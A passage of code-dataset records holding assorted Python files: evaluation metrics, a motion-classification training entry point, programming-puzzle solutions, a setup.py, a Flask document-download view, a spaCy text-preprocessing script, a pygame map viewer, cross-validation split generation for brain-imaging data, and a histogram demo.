This is essential for calculating rougeL\n on multi sentence summaries (CNN/DM dataset).\n Returns:\n Dict[score: value] if aggregate else defaultdict(list) keyed by rouge_keys\n \"\"\"\n scorer = rouge_scorer.RougeScorer(rouge_keys, use_stemmer=use_stemmer)\n aggregator = scoring.BootstrapAggregator()\n for pred, tgt in zip(pred_lns, tgt_lns):\n # rougeLsum expects \"\\n\" separated sentences within a summary\n if newline_sep:\n pred = add_newline_to_end_of_each_sentence(pred)\n tgt = add_newline_to_end_of_each_sentence(tgt)\n scores = scorer.score(pred, tgt)\n aggregator.add_scores(scores)\n\n if bootstrap_aggregation:\n result = aggregator.aggregate()\n if return_precision_and_recall:\n return extract_rouge_mid_statistics(result) # here we return dict\n else:\n return {k: round(v.mid.fmeasure * 100, 4) for k, v in result.items()}\n\n else:\n return aggregator._scores # here we return defaultdict(list)\n\n\ndef extract_rouge_mid_statistics(dct):\n new_dict = {}\n for k1, v1 in dct.items():\n mid = v1.mid\n new_dict[k1] = {\n stat: round(getattr(mid, stat), 4) for stat in [\"precision\", \"recall\", \"fmeasure\"]\n }\n return new_dict\n\n\nif __name__ == '__main__':\n pred = \"first string a a a\"\n ref = [\"second string b b b\"]\n print(calculate_bleu(pred, ref))\n","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"384248572","text":"from google.colab import drive\nfrom torch.utils.tensorboard import SummaryWriter\nimport os\nimport numpy as np\nimport glob\nimport torchvision\nimport torch\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nimport matplotlib.pyplot as plt\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nimport torch.functional as F\nimport torch.autograd as autograd\nfrom model import *\nfrom util import *\nimport argparse\nfrom torch.autograd import Variable\nfrom train import *\n\n\n# Create the argument parser\nparser = argparse.ArgumentParser(description='Human motion classification', \n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\nparser.add_argument('--lr', default=1e-3, type=float, dest='lr')\nparser.add_argument('--batch_size', default=4, type=int, dest='batch_size')\nparser.add_argument('--num_epoch', default=400, type=int, dest='num_epoch')\n\nparser.add_argument('--train_data_dir', default='/content/drive/My Drive/human_motion/traindata', type=str, dest='train_data_dir')\nparser.add_argument('--test_data_dir', default='/content/drive/My Drive/human_motion/testdata', type=str, dest='test_data_dir')\nparser.add_argument('--lstm_ckpt_dir', default='/content/drive/My Drive/human_motion/checkpoint', type=str, dest='lstm_ckpt_dir')\nparser.add_argument('--lstm_log_dir', default='/content/drive/My Drive/human_motion/log', type=str, dest='lstm_log_dir')\nparser.add_argument('--lstm_figure_dir', default='/content/drive/My Drive/human_motion/figure', type=str, dest='lstm_figure_dir')\nparser.add_argument('--oversampling_ckpt_dir', default='/content/drive/My Drive/human_motion/checkpoint', type=str, dest='oversampling_ckpt_dir')\nparser.add_argument('--oversampling_log_dir', default='/content/drive/My Drive/human_motion/log', type=str, dest='oversampling_log_dir')\nparser.add_argument('--oversampling_figure_dir', default='/content/drive/My Drive/human_motion/figure', type=str,
dest='oversampling_figure_dir')\nparser.add_argument('--weight_balancing_ckpt_dir', default='/content/drive/My Drive/human_motion/checkpoint', type=str, dest='weight_balancing_ckpt_dir')\nparser.add_argument('--weight_balancing_log_dir', default='/content/drive/My Drive/human_motion/log', type=str, dest='weight_balancing_log_dir')\nparser.add_argument('--weight_balancing_figure_dir', default='/content/drive/My Drive/human_motion_figure', type=str, dest='weight_balancing_figure_dir')\nparser.add_argument('--feature_gan_ckpt_dir', default='/content/drive/My Drive/human_motion/checkpoint', type=str, dest='feature_gan_ckpt_dir')\nparser.add_argument('--feature_gan_log_dir', default='/content/drive/My Drive/human_motion/log', type=str, dest='feature_gan_log_dir')\nparser.add_argument('--lstm_retrain_ckpt_dir', default='/content/drive/My Drive/human_motion/checkpoint', type=str, dest='lstm_retrain_ckpt_dir')\nparser.add_argument('--lstm_retrain_log_dir', default='/content/drive/My Drive/human_motion/log', type=str, dest='lstm_retrain_log_dir')\nparser.add_argument('--lstm_retrain_figure_dir', default='/content/drive/My Drive/human_motion/figure', type=str, dest='lstm_retrain_figure_dir')\n\nparser.add_argument('--sequence_length', default=100, type=int, dest='sequence_length')\nparser.add_argument('--input_size', default=60, type=int, dest='input_size')\nparser.add_argument('--num_lstm', default=1, type=int, dest='num_lstm')\nparser.add_argument('--lstm_hidden_size', default=100, type=int, dest='lstm_hidden_size')\nparser.add_argument('--fg_hidden_size', default=50, type=int, dest='fg_hidden_size')\nparser.add_argument('--num_classes', default=12, type=int, dest='num_classes')\nparser.add_argument('--dropout', default=0.2, type=float, dest='dropout')\nparser.add_argument('--latent_size', default=10, type=int, dest='latent_size')\n\nparser.add_argument('--mode', default='train', type=str, dest='mode')\nparser.add_argument('--unbalancing_rate', default=1.0, type=float, dest='unbalancing_rate')\nparser.add_argument('--train_continue', default='off', type=str, dest='train_continue')\n\n\nPARSER = Parser(parser)\n\ndef main():\n ARGS = PARSER.get_arguments()\n PARSER.print_args()\n\n TRAINER = Train(ARGS)\n\n if ARGS.mode == 'lstm':\n TRAINER.lstm()\n elif ARGS.mode == 'oversampling':\n TRAINER.lstm()\n elif ARGS.mode == 'weight_balancing':\n TRAINER.lstm()\n elif ARGS.mode == 'feature_gan':\n TRAINER.feature_gan()\n elif ARGS.mode == 'lstm_retrain':\n TRAINER.lstm_retrain()\n else:\n print('='*40)\n print('The entered \"mode\" does not exist')\n print('='*40)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"645907648","text":"'''\nJosephus Problem 0\nTime limit\tMemory limit\tSubmissions\tCorrect\tSolvers\tSuccess rate\n2 s\t512 MB\t6371\t3621\t3167\t58.987%\nProblem\nThe Josephus problem is as follows.\n\nN people numbered 1 to N are sitting in a circle, and a positive integer K (≤ N) is given.\nNow the K-th person in order is removed.\nOnce a person is removed, the process continues around the circle of the remaining people.\nThis process continues until all N people have been removed.\nThe order in which people are removed from the circle is called the (N, K)-Josephus permutation.\nFor example, the (7, 3)-Josephus permutation is <3, 6, 2, 7, 5, 1, 4>.\n\nGiven N and K, write a program that finds the (N, K)-Josephus permutation.\n\nInput\nOn the first line, N and K are given in order, separated by a space. (1 ≤ K ≤ N ≤ 1,000)\n\nOutput\nPrint the Josephus permutation as in the example.\n\nSample Input 1\n7 3\nSample Output 1\n<3, 6, 2, 7, 5, 1, 4>\nSource\nProblem author: baekjoon\n'''\n# n, k = 10, 3\nn, k = map(int,input().split())\n\nqueue = [i for i in range(1,n+1)]\njosephus = []\npos = 0\nwhile queue:\n pos = (pos+k-1) % len(queue)\n josephus.append(str(queue.pop(pos)))\n\nprint('<'+', '.join(josephus)+'>')\n","sub_path":"python3/boj/queue/11866_조세퍼스_문제_0.py","file_name":"11866_조세퍼스_문제_0.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"157428719","text":"from setuptools import setup, find_packages\n\ninstall_requires = [\n 'numpy',\n 'tensorflow',\n 'matplotlib',\n]\n\nsetup(\n name = \"tensorlayer\",\n version = \"1.1\",\n include_package_data=True,\n author='TensorLayer Contributors',\n author_email='hao.dong11@imperial.ac.uk',\n url = \"https://github.com/zsdonghao/tensorlayer\" ,\n license = \"apache\" ,\n packages = find_packages(),\n install_requires=install_requires,\n # scripts=['tutorial_mnist.py'],\n description = \"Deep learning and Reinforcement learning library for Researchers and Engineers\",\n keywords = \"deep learning, reinforcement learning, tensorflow\",\n platform=['any'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"501292491","text":"# https://programmers.co.kr/learn/courses/30/lessons/68935\r\n\r\ndef solution(n):\r\n a = \"\"\r\n while n:\r\n a += str(n%3)\r\n n//=3\r\n a = a[::-1]\r\n\r\n ans = 0\r\n for i in range(len(a)):\r\n ans += int(a[i]) * (3**i)\r\n return ans\r\nprint(solution(125))\r\n","sub_path":"Level 1/3진법 뒤집기.py","file_name":"3진법 뒤집기.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"624582878","text":"import requests\nfrom flask import abort, current_app, render_template, request\nfrom notifications_python_client.errors import HTTPError\n\nfrom app import service_api_client\nfrom app.main import main\nfrom app.utils import assess_contact_type\n\n\n@main.route('/_status')\ndef status():\n return \"ok\", 200\n\n\n@main.route('/d/<service_id>/<document_id>', methods=['GET'])\ndef landing(service_id, document_id):\n key = request.args.get('key', None)\n if not key:\n abort(404)\n\n try:\n service = service_api_client.get_service(service_id)\n except HTTPError as e:\n abort(e.status_code)\n\n service_contact_info = service['data']['contact_link']\n contact_info_type = assess_contact_type(service_contact_info)\n\n if not _get_document_metadata(service_id, document_id, key):\n return render_template(\n 'views/file_unavailable.html',\n service_name=service['data']['name'],\n service_contact_info=service_contact_info,\n contact_info_type=contact_info_type,\n )\n\n return render_template(\n 'views/index.html',\n service_id=service_id,\n service_name=service['data']['name'],\n service_contact_info=service_contact_info,\n contact_info_type=contact_info_type,\n document_id=document_id,\n key=key\n )\n\n\n@main.route('/d/<service_id>/<document_id>/download', methods=['GET'])\ndef download_document(service_id, document_id):\n key = request.args.get('key', None)\n if not key:\n abort(404)\n\n try:\n service = service_api_client.get_service(service_id)\n except HTTPError as e:\n abort(e.status_code)\n\n metadata = _get_document_metadata(service_id, document_id, key)\n service_contact_info =
service['data']['contact_link']\n contact_info_type = assess_contact_type(service_contact_info)\n\n if not metadata:\n return render_template(\n 'views/file_unavailable.html',\n service_name=service['data']['name'],\n service_contact_info=service_contact_info,\n contact_info_type=contact_info_type,\n )\n\n return render_template(\n 'views/download.html',\n download_link=metadata['direct_file_url'],\n service_name=service['data']['name'],\n service_contact_info=service_contact_info,\n contact_info_type=contact_info_type,\n )\n\n\ndef _get_document_metadata(service_id, document_id, key):\n check_file_url = '{}/services/{}/documents/{}/check?key={}'.format(\n current_app.config['DOCUMENT_DOWNLOAD_API_HOST_NAME'],\n service_id,\n document_id,\n key\n )\n response = requests.get(check_file_url)\n\n if response.status_code == 400:\n error_msg = response.json().get('error', '')\n # If the decryption key is missing or can't be decoded using `urlsafe_b64decode`,\n # the error message will contain 'decryption key'.\n # If the decryption key is wrong, the error message is 'Forbidden'\n if 'decryption key' in error_msg or 'Forbidden' in error_msg:\n abort(404)\n\n # Let the `500` error handler handle unexpected errors from doc-download-api\n response.raise_for_status()\n\n return response.json().get('document')\n","sub_path":"app/main/views/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"415143416","text":"import sys\nimport argparse\nimport os\nimport json\nimport html\nimport string\nimport re\nimport unicodedata\nimport spacy\nfrom spacy.tokens import Doc\n\n# region Constants and Builder Functions\n\n# CDF data directory\nindir = '/u/cs401/A1/data/'\n\n# CDF wordlists directory\nwordlists_dir = \"/u/cs401/Wordlists\"\n\n\ndef build_clitic_regex():\n \"\"\"\n Builds a regex to capture the clitics specified in the assignment handout.\n \"\"\"\n return re.compile(\"(\" + \"|\".join(\n [\n # Clitics with starting apostrophe have trailing whitespace\n f\"{left_clitic}\\s+\"\n for left_clitic in\n [\"'d\", \"'n\", \"'ve\", \"'re\", \"'ll\", \"'m\", \"'s\"]\n ] + [\n # Clitics with ending apostrophe have leading whitespace\n f\"\\s+{right_clitic}\"\n for right_clitic in\n [\"t'\", \"y'\"]\n ] + [\n \"s'\\s*\", # Plural possessive clitic\n \"n't\\s*\" # not -> n't contraction\n ]\n ) + \")\", flags=re.IGNORECASE)\n\n\ndef build_abbrev_regex():\n \"\"\"\n Builds a regex to capture the abbreviations specified in the assignment handout.\n \"\"\"\n abbrev_path = os.path.join(wordlists_dir, \"abbrev.english\")\n with open(abbrev_path, \"r\") as abbrev_file:\n abbreviations = [\n line.strip()\n for line in abbrev_file.readlines()\n ]\n return re.compile(\"|\".join(re.escape(x) for x in abbreviations))\n\n\ndef build_punc_regex():\n \"\"\"\"\n Builds a regex to capture punctuation characters.\n \"\"\"\n return re.compile(\"|\".join(\n re.escape(x) for x in string.punctuation\n ))\n\n\ndef build_multi_punc_regex():\n \"\"\"\"\n Builds a regex to capture multiple punctuation characters.\n \"\"\"\n base_regex = build_punc_regex()\n return re.compile(f\"({base_regex.pattern}){{2,}}\")\n\n\ndef build_nlp():\n \"\"\"\n Builds the Spacy NLP processor needed for the preprocessing.\n \"\"\"\n return spacy.load(\"en\", disable=[\"parser\", \"ner\"])\n\n\ndef build_stopwords():\n \"\"\"\n Builds a set of stopwords as specified in the assignment handout.\n \"\"\"\n stopwords_path = 
os.path.join(wordlists_dir, \"StopWords\")\n with open(stopwords_path, mode=\"r\") as file:\n return {\n line.strip()\n for line in file.readlines()\n }\n\n\n# Obtained from http://www.noah.org/wiki/RegEx_Python#URL_regex_pattern\nurl_regex = re.compile(\n \"http[s]?:\\/\\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+\"\n)\n\nabbrev_regex = build_abbrev_regex()\n\npunc_regex = build_punc_regex()\n\nmulti_punc_regex = build_multi_punc_regex()\n\nclitic_regex = build_clitic_regex()\n\nnlp = build_nlp()\n\nstopwords = build_stopwords()\n\n\n# endregion\n\n\n# region Helper Functions\n\ndef spacy_tokens(string):\n \"\"\"\n Returns a list of Spacy Token objects.\n Accomplished as as instructed in tutorial\n http://www.cs.toronto.edu/~frank/csc401/tutorials/csc401_A1_tut2.pdf\n SLIDE 16\n \"\"\"\n doc = spacy.tokens.Doc(nlp.vocab, words=string.split())\n return nlp.tagger(doc)\n\n\n# endregion\n\n# region Process Steps\n\n\ndef remove_newlines(string):\n \"\"\"(str) -> str\n Replaces newlines \"\\n\" in string with a space \" \",\n then strips off leading and trailing whitespace.\n\n :param string: some input string\n :return: string where \"\\n\" is replaced with \" \"\n\n \"\"\"\n return string \\\n .replace(\"\\n\", \" \") \\\n .strip()\n\n\ndef replace_html_codes(string):\n \"\"\"(str) -> str\n\n Replaces all HTML character codes in string with\n their ASCII equivalent.\n\n Sources:\n https://stackoverflow.com/questions/16467479/normalizing-unicode\n https://stackoverflow.com/questions/20078816/replace-non-ascii-characters-with-a-single-space\n https://stackoverflow.com/questions/44431730/how-to-replace-accented-characters-in-python\n\n :param string: some input string\n :return: string with each HTML character converted to ASCII\n \"\"\"\n\n unicode_str = html.unescape(string)\n\n return unicodedata.normalize(\"NFD\", unicode_str) \\\n .encode(\"ascii\", \"ignore\") \\\n .decode(\"utf-8\") \\\n .encode(\"ascii\", \"ignore\") \\\n .decode()\n\n\ndef remove_urls(string):\n \"\"\"\n Removes all URLs from string.\n\n URLs are defined as tokens (space separated)\n that start with \"www\" or \"http\".\n\n :param string: some input string\n :return: string, with each URL removed\n \"\"\"\n return url_regex.sub(\" \", string)\n\n\ndef split_punctuation(string):\n \"\"\"\n Accomplishes step 4 of the preprocessing pipeline.\n \"\"\"\n\n # Determine indices of punctuation symbols\n # (that are not apostrophes)\n punc_inds = set(\n ind\n for match in punc_regex.finditer(string)\n if string[match.span()[0]] != \"'\"\n for ind in match.span()\n )\n\n # Remove anything within an abbreviation from consideration\n for match in abbrev_regex.finditer(string):\n start, end = match.span()\n for i in range(start, end + 1):\n punc_inds.discard(i)\n\n # Remove the indices within multiple punctuations\n for match in multi_punc_regex.finditer(string):\n start, end = match.span()\n for i in range(start + 1, end):\n punc_inds.discard(i)\n\n # Insert spaces in front of the targeted indices\n return \"\".join([\n f\" {char}\" if i in punc_inds else char\n for (i, char) in enumerate(string)\n ])\n\n\ndef split_clitics(string):\n \"\"\"\n Accomplishes step 5 of the preprocessing pipeline.\n \"\"\"\n\n def clitic_replacer(match):\n\n # Get rid of trailing spaces for easier analysis\n clitic = match.group().strip()\n\n # Special case: inject space for plural possessive\n if clitic == \"s'\":\n return \"s '\"\n else:\n return f\" {clitic} \"\n\n return re.sub(clitic_regex,\n clitic_replacer,\n 
string)\n\n\ndef spacy_tagging(string,\n add_tags,\n remove_stopwords,\n lemmatize,\n split_sentences,\n to_lowercase):\n \"\"\"\n Accomplishes steps 6-10 of the preprocessing pipeline.\n These are all done in one function to avoid overhead from calling Spacy multiple times.\n This function only needs to call Spacy once.\n\n :param string: input string\n\n :param add_tags: whether or not to add Spacy's POS tags to words (step 6)\n\n :param remove_stopwords: whether or not to remove stopwords (step 7)\n\n :param lemmatize: whether or not to lemmatize the Spacy tokens (step 8)\n\n :param split_sentences: whether or not to newline split sentences (step 9)\n\n :param to_lowercase: whether or not to lowercase the obtained tokens (step 10)\n \"\"\"\n\n sentences = []\n cur_sentence = []\n\n for token in spacy_tokens(string):\n\n # Skip over stopwords if asked (step 7)\n if remove_stopwords and \\\n token.text.lower() in stopwords:\n continue\n\n # Determine the word we want (step 8)\n if lemmatize and (token.lemma_[0] != '-'):\n\n # Handout Pg. 4 says for lemmatization,\n # only take tokens with non-dash beginnings\n word = token.lemma_\n\n else:\n word = token.text\n\n # Determine if word should be lowercased (step 9)\n # (tags should not be lowercased!)\n # https://piazza.com/class/jpzxwr3vuqa1tn?cid=236\n if to_lowercase:\n word = word.lower()\n\n # Determine if we want tags (step 6)\n if add_tags:\n to_add = f\"{word}/{token.tag_}\"\n else:\n to_add = word\n\n # Add the result to the current sentence\n cur_sentence += [to_add]\n\n # If the token we just added was a sentence-closer (.)\n # https://spacy.io/api/annotation -> \".\" is a sentence closer\n if split_sentences and (token.tag_ == \".\"):\n sentences += [cur_sentence]\n cur_sentence = []\n\n # Add any remaining sentences\n sentences += [cur_sentence]\n\n return \"\\n\".join(\n \" \".join(sent)\n for sent in sentences\n )\n\n\n# endregion\n\ndef preproc1(comment, steps=range(1, 11)):\n ''' This function pre-processes a single comment\n\n Parameters: \n comment : string, the body of a comment\n steps : list of ints, each entry in this list corresponds to a preprocessing step \n\n Returns:\n modComm : string, the modified comment \n '''\n\n # For faster containment checking\n step_set = set(steps)\n\n # No steps selected means modComm is empty\n if len(step_set) == 0:\n return \"\"\n\n # Steps were selected, apply them in ORDER\n modComm = comment\n if 1 in step_set:\n modComm = remove_newlines(modComm)\n if 2 in step_set:\n modComm = replace_html_codes(modComm)\n if 3 in step_set:\n modComm = remove_urls(modComm)\n if 4 in step_set:\n modComm = split_punctuation(modComm)\n if 5 in step_set:\n modComm = split_clitics(modComm)\n\n # Steps 6,7,8,9 are accomplished by one function\n # (to only call spacy once)\n if any((i in step_set)\n for i in [6, 7, 8, 9, 10]):\n modComm = spacy_tagging(modComm,\n add_tags=(6 in step_set),\n remove_stopwords=(7 in step_set),\n lemmatize=(8 in step_set),\n split_sentences=(9 in step_set),\n to_lowercase=(10 in step_set))\n\n return modComm\n\n\ndef main(args):\n allOutput = []\n for subdir, dirs, files in os.walk(indir):\n for file in files:\n fullFile = os.path.join(subdir, file)\n print(\"Processing \" + fullFile)\n\n data = json.load(open(fullFile))\n\n # Select appropriate args.max lines\n max_lines = args.max\n start_ind = args.ID[0] % len(data)\n end_ind = start_ind + max_lines\n\n for raw_line_num in range(start_ind, end_ind):\n line_num = raw_line_num % len(data)\n\n # Read comment given line 
number\n comment = json.loads(data[line_num])\n\n # Add category field (determined by filename)\n comment['cat'] = file\n\n # Replace body with processed version (use default steps)\n comment['body'] = preproc1(comment['body'])\n\n # Add modified comment to \"allOutput\"\n allOutput += [comment]\n\n # Refactored from original to use with statement (auto closes)\n with open(args.output, 'w') as fout:\n fout.write(json.dumps(allOutput))\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Process each .')\n parser.add_argument('ID', metavar='N', type=int, nargs=1,\n help='your student ID')\n\n parser.add_argument(\"-o\", \"--output\",\n help=\"Directs the output to a filename of your choice\",\n type=str,\n required=True)\n\n parser.add_argument(\"--max\",\n help=\"The maximum number of comments to read from each file\",\n type=int,\n default=10000)\n\n args = parser.parse_args()\n\n if (args.max > 200272):\n print(\"Error: If you want to read more than 200,272 comments per file, you have to read them all.\")\n sys.exit(1)\n\n main(args)\n","sub_path":"assignments/a1/code/a1_preproc.py","file_name":"a1_preproc.py","file_ext":"py","file_size_in_byte":11443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"323760425","text":"import pygame_gui\nimport sys\nfrom io import BytesIO\nimport requests\nfrom PIL import Image\nfrom geocoder import *\nimport random\nimport os\nimport pygame\nfrom pygame_gui.elements.ui_selection_list import UISelectionList\nfrom pygame_gui.elements.ui_drop_down_menu import UIDropDownMenu\nfrom pygame_gui.elements.ui_text_entry_line import UITextEntryLine\n\nmap_file = \"map.png\"\nmap_type = \"map\"\n\n\nZOOM = 15\nll, _ = get_ll_spn(geocoder_request((\"Пермь\")))\npt = ll.copy()\n\npygame.init()\nscreen = pygame.display.set_mode((600, 450))\n\nbackground = pygame.Surface((800, 600))\nbackground.fill(pygame.Color(\"#000000\"))\n\nmanager = pygame_gui.UIManager((600, 450))\n\nmenu = UIDropDownMenu(\n options_list=[\"схема\", \"спутник\", \"гибрид\"],\n starting_option=\"схема\",\n relative_rect=pygame.Rect(0, 0, 200, 30),\n manager=manager,\n)\n\ntext_entry = UITextEntryLine(relative_rect=pygame.Rect(0, 30, 150, 30), manager=manager)\n\nsearch_button = pygame_gui.elements.UIButton(\n relative_rect=pygame.Rect((150, 30), (50, 30)), text=\"find\", manager=manager\n)\n\n\ncancel_button = pygame_gui.elements.UIButton(\n relative_rect=pygame.Rect((0, 60), (200, 30)), text=\"cansel\", manager=manager\n)\n\n\ndef render_map(ll, map_type, z=10):\n if pt:\n img = get_map_ll(ll, map_type, z=z, pt=f\"{pt[0]},{pt[1]},pm2dgl\")\n else:\n img = get_map_ll(ll, map_type, z=z)\n if img is None:\n return False\n with open(map_file, \"wb\") as file:\n img.save(map_file)\n return True\n\n\nrender_map(ll, map_type, z=ZOOM)\nclock = pygame.time.Clock()\nrun = True\nwhile run:\n time_delta = clock.tick(60) / 1000.0\n for event in pygame.event.get():\n if event.type == pygame.USEREVENT:\n if event.user_type == pygame_gui.UI_DROP_DOWN_MENU_CHANGED:\n old_map_type = map_type\n if event.text == \"схема\":\n map_type = \"map\"\n elif event.text == \"спутник\":\n map_type = \"sat\"\n elif event.text == \"гибрид\":\n map_type = \"skl\"\n res = render_map(ll, map_type, z=ZOOM)\n if not res:\n map_type = old_map_type\n\n if event.user_type == pygame_gui.UI_BUTTON_PRESSED:\n if event.ui_element == search_button:\n try:\n ll, _ = get_ll_spn(geocoder_request((text_entry.text)))\n pt = ll.copy()\n render_map(ll, map_type, 
z=ZOOM)\n except:\n pass\n if event.ui_element == cancel_button:\n pt = None\n render_map(ll, map_type, z=ZOOM)\n\n if event.type == pygame.QUIT:\n run = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_PAGEUP:\n if render_map(ll, map_type, z=ZOOM + 1):\n ZOOM += 1\n elif event.key == pygame.K_PAGEDOWN:\n if render_map(ll, map_type, z=ZOOM - 1):\n ZOOM -= 1\n elif event.key == pygame.K_LEFT:\n ll[0] -= 0.075 / ZOOM\n render_map(ll, map_type, z=ZOOM)\n elif event.key == pygame.K_RIGHT:\n ll[0] += 0.075 / ZOOM\n render_map(ll, map_type, z=ZOOM)\n elif event.key == pygame.K_UP:\n ll[1] += 0.05 / ZOOM\n render_map(ll, map_type, z=ZOOM)\n elif event.key == pygame.K_DOWN:\n ll[1] -= 0.05 / ZOOM\n render_map(ll, map_type, z=ZOOM)\n manager.process_events(event)\n\n manager.update(time_delta)\n\n screen.blit(background, (0, 0))\n screen.blit(pygame.image.load(map_file), (0, 0))\n manager.draw_ui(screen)\n pygame.display.update()\nos.remove(\"map.png\")\n","sub_path":"task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"381325901","text":"\nimport os.path as os\nimport tables\n\nfrom sklearn.model_selection import LeavePGroupsOut, GroupShuffleSplit, StratifiedShuffleSplit\n\nimport numpy as np\n\n\nexperiment = 'meg'\n# fmri\nif experiment == 'fmri':\n hemi = 'lh'\n method = 'multi2' # 'transfer' or 'multi'\n split_nb = 1000\n proj_dir = '/hpc/crise/wang.q/data/100_subjects_voice_classification/'\n # get data\n data_dir = proj_dir + 'data/'\n data_path = os.join(data_dir, '{}.100subjects_data.h5'.format(hemi))\n h5file = tables.open_file(data_path, driver='H5FD_CORE')\n data = h5file.root.data[:]\n y_class = h5file.root.y_class[:]\n subjects = h5file.root.subjects[:]\n h5file.close()\n x_data = data.flatten().reshape(4000,5400)\n y_target = np.array(y_class)\n\n if method == 'transfer':\n logo = GroupShuffleSplit(n_splits=split_nb, test_size=0.1)\n logo_cv = logo.split(x_data, y_target, subjects)\n cross_v = []\n for train_index, test_index in logo_cv:\n cross_v.append((train_index, test_index))\n\n cv_name = 'data/{0}_{1}splits.npy'.format(method, split_nb)\n np.save(proj_dir + cv_name, cross_v)\n\n elif method == 'multi':\n test_stimuli = [] # 1000 different sets, each set is to choose 4 stimuli from 40,\n i = 0\n while i < split_nb:\n vo1 = int(np.random.uniform(0, 20))\n vo2 = int(np.random.uniform(0, 20))\n nv1 = int(np.random.uniform(20, 40))\n nv2 = int(np.random.uniform(20, 40))\n if vo1 != vo2 and nv1 != nv2:\n i += 1\n test_stimuli.append(sorted([vo1, vo2, nv1, nv2]))\n cross_v = []\n for i in range(split_nb):\n test_index = np.array([m + n\n for m in range(0, 4000, 40)\n for n in test_stimuli[i]])\n full_index = np.arange(4000)\n train_index = np.delete(full_index, test_index)\n cross_v.append((train_index, test_index))\n cv_name = 'data/{0}_{1}splits.npy'.format(method, split_nb)\n np.save(proj_dir + cv_name, cross_v)\n\n else:\n\n cross_v = []\n stimulis = np.hstack([np.ones(20), np.zeros(20)])\n sss = StratifiedShuffleSplit(n_splits=100, test_size=0.1,\n random_state=0)\n sss_cv = sss.split(stimulis, stimulis)\n test_stimulis = []\n for train, test in sss_cv:\n test_stimulis.append(test)\n for i in range(split_nb):\n np.random.shuffle(test_stimulis)\n test_index = []\n sample_nb = 0\n for test_stimuli in test_stimulis:\n test_index.append(test_stimuli + sample_nb)\n sample_nb += 40\n test_index = sorted(np.hstack(test_index))\n test_index = 
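# --- Editor's sketch (illustrative, not from the task7.py record above). ---
# task7.py pans the map by a fixed fraction divided by the zoom level, so one
# keypress moves the view a similar on-screen distance at every zoom:
def pan(lon, lat, key, zoom):
    """Return the new (lon, lat) after one arrow-key press."""
    dx, dy = 0.075 / zoom, 0.05 / zoom   # step sizes taken from the record
    moves = {
        "left":  (-dx, 0.0),
        "right": (dx, 0.0),
        "up":    (0.0, dy),
        "down":  (0.0, -dy),
    }
    mx, my = moves[key]
    return lon + mx, lat + my

# pan(56.25, 58.0, "right", 15) -> (56.255, 58.0)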
np.array(test_index)\n full_index = np.arange(4000)\n train_index = np.delete(full_index, test_index)\n cross_v.append((train_index, test_index))\n cv_name = 'data/{0}_{1}splits.npy'.format(method, split_nb)\n np.save(proj_dir + cv_name, cross_v)\n\n\n\n\nelse:\n# meg\n\n hemi = 'whole'\n method = 'multi' # 'transfer' or 'multi'\n split_nb = 120\n proj_dir = '/hpc/crise/wang.q/data/meg_decode/'\n # get data\n data_dir = proj_dir + 'data/'\n data_path = os.join(data_dir, '16subjects_meg_data_aranged.h5')\n h5file = tables.open_file(data_path, driver='H5FD_CORE')\n x_data = h5file.root.X_train[:]\n y_target = h5file.root.y_train[:]\n subjects = h5file.root.s_train[:]\n h5file.close()\n\n\n if method == 'transfer':\n lpgo = LeavePGroupsOut(n_groups=2)\n lpgo_cv = lpgo.split(x_data, y_target, subjects)\n cross_v = []\n for train_index, test_index in lpgo_cv:\n cross_v.append((train_index, test_index))\n\n cv_name = 'data/{0}_{1}splits_aranged.npy'.format(method, split_nb)\n np.save(proj_dir + cv_name, cross_v)\n\n elif method == 'multi':\n cross_v = []\n stimulis = np.hstack([np.ones(288), np.zeros(288)])\n sss = StratifiedShuffleSplit(n_splits=16, test_size=0.125,\n random_state=0)\n sss_cv = sss.split(stimulis, stimulis)\n test_stimulis = []\n for train, test in sss_cv:\n test_stimulis.append(test)\n for i in range(split_nb):\n np.random.shuffle(test_stimulis)\n test_index = []\n sample_nb = 0\n for test_stimuli in test_stimulis:\n test_index.append(test_stimuli + sample_nb)\n sample_nb += 576\n test_index = sorted(np.hstack(test_index))\n test_index = np.array(test_index)\n full_index = np.arange(9216)\n train_index = np.delete(full_index, test_index)\n cross_v.append((train_index, test_index))\n cv_name = 'data/{0}_{1}splits_aranged.npy'.format(method, split_nb)\n np.save(proj_dir + cv_name, cross_v)\n\n\n\n","sub_path":"create_cv.py","file_name":"create_cv.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"394390012","text":"## Author: Boris Chan\n## Date: 22/12/2016\n## Purpose: Ploting histogram to understand features\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n## dog population\ngreyhounds = 500\nlabs = 500\n\n## height variance\ngrey_height = 28 + 4 * np.random.randn(greyhounds)\nlab_height = 24 + 4 * np.random.randn(labs)\n\n## histogram plot\nplt.hist([grey_height, lab_height], stacked=True, 